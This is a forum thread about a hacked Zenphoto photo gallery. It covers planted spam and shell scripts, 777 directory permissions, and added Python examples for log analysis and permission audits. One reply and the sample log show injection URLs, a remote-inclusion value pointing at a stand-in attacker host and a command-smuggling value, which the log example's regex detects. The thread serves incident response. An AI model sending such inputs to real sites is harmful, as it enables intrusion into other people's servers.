My zenphoto got hacked?

Hi,

I just found that two of my three Zenphoto installs got hacked on the 1st of August!
One is version 1.1.5 and the other one 1.1.6.

There is a file called "mailerok.php" in the /albums/ directory of Zenphoto which is a script for email-spamming purposes.

Has anybody else got the same problem? Is this a Zenphoto problem or a problem with the directory access?

Comments

  • Just saw that there is a second file called EngShell99.php, which is a little more evil, it seems.
  • trisweb Administrator
    Are you on a shared server? It's possible that someone else copied that file to your account due to the /albums directory having loose permissions for uploading.

    If the files are still around, what user/group owns them and what are their permissions? You should be able to see this in your FTP program, or in SSH if you have access.

    It is very very unlikely that Zenphoto would ever allow writing a PHP file to the albums directory. As far as I know, it only writes images, filters for images, and edits images. But, maybe the rest of the team has insights, as I haven't reviewed every line of code since 1.1 was released.

    If you're on a shared server I would bet it's the directory permissions and someone just taking advantage of that; I would contact your host, especially if you see a user or group that the file belongs to.
  • Only admins can upload anything. Even then the file extensions are checked for being image files. (I don't know if zip file contents are checked--not familiar with that code.)

    But at any rate, someone would have to have admin upload privileges first.
  • I'm not heavily into network security anymore, but could it be possible that Zenphoto may be vulnerable to PHP or SQL code injections?

    If the files are owned by your username and group then it could be possible that someone has your username/password or there is a breach in zenphoto somewhere.

    Can you check your web logs for any attempts? Check both the access and error logs. Error logs are usually very clear because they usually are logged if it doesn't fit but there may be a lot of false positives on those as well.

    First try seeing if anyone is accessing those two rogue files. Then look for any consistency, i.e. if it always comes from the same IP. Then scan the logs as far as you can go back to see if there's any other attempts from that IP or range.

    Second, try looking for funny injection URLs. Usually they try more than one time until they figure out what works. Usually they look like www.yoursite.com/index.php?album=http://evilhackingsite.com or www.yoursite.com/index.php?album=';echo "fjskdjs";&

    Let us know how you make out because it'll be nice to get to the bottom of this. I'm not sure of your familiarity with unix accounts but there are a couple of commands that you can use like last that will let you know your telnet/ssh/ftp connection attempts or maybe your ISP has some sort of other logging.
  • Thanks for your answers! I checked my logs - these are the results:

    Absolutely nothing about the files mailerok.php and EngShell99.php in my FTP logs. So I conclude the files have been written by some script, or the logs were modified afterwards?

    The HTTP access logs show two IPs, one is 125.164.252.196 and the second 125.164.250.53. Both IPs are the only ones which access these files - and the IPs are the same on different days - maybe he has a static IP.

    I can post the logs here if you want to - it's not that much, maybe 80 lines or so.
  • The last two lines before he accessed the mailerok.php are:

    125.164.252.196 - - [01/Aug/2008:11:00:55 +0200] "GET /albums/ HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
    125.164.252.196 - - [01/Aug/2008:11:01:21 +0200] "GET /albums/ HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702

    Before these lines he just looked at some pictures but nothing suspicious in the urls.

    I found this issue - is this fixed in 1.1.5 and 1.1.6?

    http://en.securitylab.ru/poc/311064.php
  • acrylian Administrator, Developer
    Yes, that issue should be fixed, but you should also consider upgrading to 1.1.7 (or wait for the soon-to-come 1.2).
  • That's a good start.

    Those IPs are originating from one of the main ISPs in Indonesia. So most likely the IPs will be dynamic and changing all the time. If I were you I'd check the entire logs for partial matches to the IPs 125.164.x.x. (or all the logs if it's not too large and go back a couple days prior so we can figure out where the entry point was). You can use Excel's Text to Columns function to split the raw log files into more manageable columns where you can sort and eliminate.

    It's possible to bait him by removing the two files and seeing if he will attempt to exploit whatever hole he used before.
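The log checks suggested in the two replies above (see who is requesting the rogue files, whether it is always the same IP, whether there are injection-style album= URLs, and then partial matches such as 125.164.x.x), as an added example in Python. This is not code from the thread or from Zenphoto; it parses Apache combined-format lines like the two posted above, the sample log below is constructed (the two thread lines plus made-up surrounding traffic from the reported IPs), and the injection pattern is an assumption based on the URL shapes described in the reply.

```python
import re
from collections import defaultdict

# Apache "combined" log format, the layout of the lines posted in the thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The two rogue files named in the thread.
ROGUE_FILES = ("mailerok.php", "EngShell99.php")

# Assumed pattern for the "funny injection URLs" the reply describes: an album=
# value that is an absolute URL, or that starts with a quote or a semicolon
# (raw or percent-encoded, which is how a browser would send it).
INJECTION_RE = re.compile(r"[?&]album=(https?://|'|%27|;|%3B)", re.IGNORECASE)

# Constructed sample log. Lines 2 and 3 are the ones posted in the thread (the
# third is truncated there, and stays truncated here); the rest are made up.
SAMPLE_LOG = """\
125.164.252.196 - - [01/Aug/2008:10:58:10 +0200] "GET /index.php?album=holiday HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
125.164.252.196 - - [01/Aug/2008:11:00:55 +0200] "GET /albums/ HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
125.164.252.196 - - [01/Aug/2008:11:01:21 +0200] "GET /albums/ HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702
125.164.252.196 - - [01/Aug/2008:11:02:03 +0200] "GET /index.php?album=http://evilhackingsite.com HTTP/1.1" 200 1 "-" "Mozilla/5.0"
125.164.252.196 - - [01/Aug/2008:11:02:40 +0200] "GET /index.php?album=%27;echo%20%22fjskdjs%22;& HTTP/1.1" 500 0 "-" "Mozilla/5.0"
125.164.252.196 - - [01/Aug/2008:11:03:12 +0200] "GET /albums/mailerok.php HTTP/1.1" 200 310 "-" "Mozilla/5.0"
125.164.250.53 - - [03/Aug/2008:09:14:27 +0200] "GET /albums/mailerok.php HTTP/1.1" 200 310 "-" "Mozilla/5.0"
125.164.250.53 - - [03/Aug/2008:09:15:01 +0200] "POST /albums/EngShell99.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.7 - - [03/Aug/2008:10:00:00 +0200] "GET /index.php?album=cats HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one combined-format line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def analyze(lines):
    """Return requests to the rogue files grouped by IP, injection-style URLs,
    and the number of lines that could not be parsed (truncated or foreign lines
    should be looked at by hand rather than silently dropped)."""
    rogue = defaultdict(list)
    injection = []
    unparsed = 0
    for line in lines:
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec is None:
            unparsed += 1
            continue
        path = rec["path"]
        # Compare the path without its query string against the rogue file names.
        if any(path.split("?")[0].endswith("/" + name) for name in ROGUE_FILES):
            rogue[rec["ip"]].append(path)
        if INJECTION_RE.search(path):
            injection.append((rec["ip"], path))
    return {"rogue": dict(rogue), "injection": injection, "unparsed": unparsed}


def requests_by_prefix(lines, prefix):
    """Count parsed requests per client IP for IPs starting with prefix (e.g. '125.164.')."""
    counts = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["ip"].startswith(prefix):
            counts[rec["ip"]] += 1
    return dict(counts)


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    report = analyze(lines)
    for ip, paths in report["rogue"].items():
        print(f"{ip} requested rogue files: {paths}")
    for ip, path in report["injection"]:
        print(f"{ip} injection-style URL: {path}")
    print(f"unparsed lines: {report['unparsed']}")
    print("requests from 125.164.x.x:", requests_by_prefix(lines, "125.164."))
```

To run it on a real log, replace `SAMPLE_LOG.splitlines()` with the lines of the access log file; the earliest request from the suspicious range that is not to a rogue file is the best candidate for the entry point the reply asks about.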
  • Thanks for your help.

    I saw that he only accesses folders with chmod 777, like the /albums and /cache folders. I tried around a little, and with 645 Zenphoto also works.

    At the time he didn't attempt to write the files again. I'm just downloading all files, cleaning them if I find anything suspicious, and doing a synchronize every day, so I can watch all folders for new files.
  • Hi,

    I just called my provider, who seems to be quite confident that it's not his problem because otherwise he would know it already (?). I don't know how serious he is about viruses, because even my desktop anti-virus detects one of the PHP files as a trojan.

    Anyway - my hosting provider said that the problem is the chmod 777 of the directories /album and /cache - is this true? And how can I get rid of the 777s?

    Thanks a lot!
  • There is a define at the beginning of functions.php and setup.php `define('CHMOD_VALUE', 0777);` which you can change. But for the existing files/folders you will have to use FTP to change the access rights.
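Added example, not Zenphoto's code and not from the thread: a small Python audit for the two conditions discussed in the last few replies, directories still at mode 777 (the world-write bit the host blamed) and PHP files sitting in /albums or /cache, where Zenphoto is only expected to write images. It also clears the world-write bit on existing directories, which is the part that changing the CHMOD_VALUE define does not do for you. The sample tree and the file name mailerok.php inside it are constructed for the demonstration, and POSIX permission bits are assumed.

```python
import os
import shutil
import stat
import tempfile

# Extensions that have no business in the media directories.
SCRIPT_EXTENSIONS = (".php", ".phtml", ".php3", ".php4", ".php5")
# The two directories the thread reports as chmod 777.
MEDIA_DIRS = ("albums", "cache")


def world_writable_dirs(root):
    """Directories under root (relative paths) whose mode has the 'other write' bit, e.g. 0777."""
    found = []
    for dirpath, dirnames, _ in os.walk(root):
        for d in dirnames:
            p = os.path.join(dirpath, d)
            if os.stat(p).st_mode & stat.S_IWOTH:
                found.append(os.path.relpath(p, root))
    return sorted(found)


def scripts_in_media_dirs(root):
    """PHP-like files anywhere below albums/ or cache/ (relative paths)."""
    found = []
    for media in MEDIA_DIRS:
        for dirpath, _, filenames in os.walk(os.path.join(root, media)):
            for f in filenames:
                if f.lower().endswith(SCRIPT_EXTENSIONS):
                    found.append(os.path.relpath(os.path.join(dirpath, f), root))
    return sorted(found)


def remove_world_write(root):
    """Clear the 'other write' bit on every directory under root (0777 becomes 0775)
    and return the directories that were changed."""
    changed = []
    for dirpath, dirnames, _ in os.walk(root):
        for d in dirnames:
            p = os.path.join(dirpath, d)
            mode = os.stat(p).st_mode
            if mode & stat.S_IWOTH:
                os.chmod(p, stat.S_IMODE(mode) & ~stat.S_IWOTH)
                changed.append(os.path.relpath(p, root))
    return sorted(changed)


def make_sample_tree():
    """Constructed stand-in for a Zenphoto install: two 777 media directories and
    a planted mailerok.php next to the album images."""
    root = tempfile.mkdtemp(prefix="zp-")
    for d in ("albums/holiday", "cache", "zp-core"):
        os.makedirs(os.path.join(root, d))
    for f in ("albums/holiday/img001.jpg", "cache/img001_thumb.jpg",
              "zp-core/functions.php", "albums/mailerok.php"):
        open(os.path.join(root, f), "w").close()
    for d in ("albums", "cache"):
        os.chmod(os.path.join(root, d), 0o777)
    for d in ("albums/holiday", "zp-core"):
        os.chmod(os.path.join(root, d), 0o755)
    return root


def cleanup_sample_tree(root):
    shutil.rmtree(root)


if __name__ == "__main__":
    root = make_sample_tree()
    print("world-writable:", world_writable_dirs(root))
    print("scripts in media dirs:", scripts_in_media_dirs(root))
    print("fixed:", remove_world_write(root))
    print("world-writable after fix:", world_writable_dirs(root))
    cleanup_sample_tree(root)
```

Pointing the three audit functions at a real install root instead of the sample tree gives the list of directories to fix and the files to remove; the web server still needs write access to those directories for Zenphoto's own image and cache writes, so the owner or group bits are left alone and only the bit that lets any other account on the host write there is cleared.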